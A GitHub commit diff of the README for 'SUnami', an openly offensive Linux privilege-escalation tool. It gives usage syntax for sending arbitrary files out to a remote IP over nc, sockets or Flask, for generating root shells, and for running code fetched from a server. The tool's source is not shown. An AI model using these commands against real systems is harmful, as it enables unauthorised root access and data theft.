Update README.md

main
witchdocsec 2023-07-09 11:05:42 +01:00 committed by GitHub
parent 5f6f01e9ab
commit 254eee05a9
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 7 additions and 4 deletions

View File

@ -1,4 +1,4 @@
# SUnami
![image](https://github.com/witchdocsec/SUnami/assets/107813117/6a6d4243-d5d0-4f68-98af-8f3edfe1c2bf)# SUnami
Struggling with linux priveledge escelation? well then its time to cheese it with SUnami.
0 interaction privesc is always recommended but not always achievable. For this reason we have created a tool for the most trivial priv esc in history (with a few drawbacks).
This is not an exploit just a cheap but effective trick. The usecase is when you have a shell on a sudoers account but no sudo cred.
@ -15,10 +15,13 @@
I used passwd so as not to leak my hash for this demo but rest assured you can read whatever file you wish
![image](https://github.com/witchdocsec/SUnami/assets/107813117/a7f26322-5fca-4030-9725-13dc5a02ac44)
## useage:
python3 sunami.py exfilfile [-local {1,0}] [--file FILE] [--method {postflask,nc,pysocket}] [--ip IP] [--port PORT]
sunami.py [-local {1,0}] exfilfile [--file FILE] [--method {postflask,nc,pysocket}] [--ip IP] [--port PORT]
# Root Shell
![image](https://github.com/witchdocsec/SUnami/assets/107813117/06000a59-b7da-45f3-8258-89618aa02a1f)
## useage:
sunami.py genshell [-local {1,0}] [--ip IP] [--port PORT] [-shell SHELL] [-protocol PROTOCOL] [-listen {1,0}]
sunami.py [-local {1,0}] genshell [--ip IP] [--port PORT] [-shell SHELL] [-protocol PROTOCOL] [-listen {1,0}]
# Run From Server
![image](https://github.com/witchdocsec/SUnami/assets/107813117/91127128-64e1-4493-bf85-068bc3a04972)
## useage
sunami.py [-local {1,0}] rfs [-h] --ip IP --port PORT --file FILE [--vars VARS [VARS ...]] [--schema SCHEMA]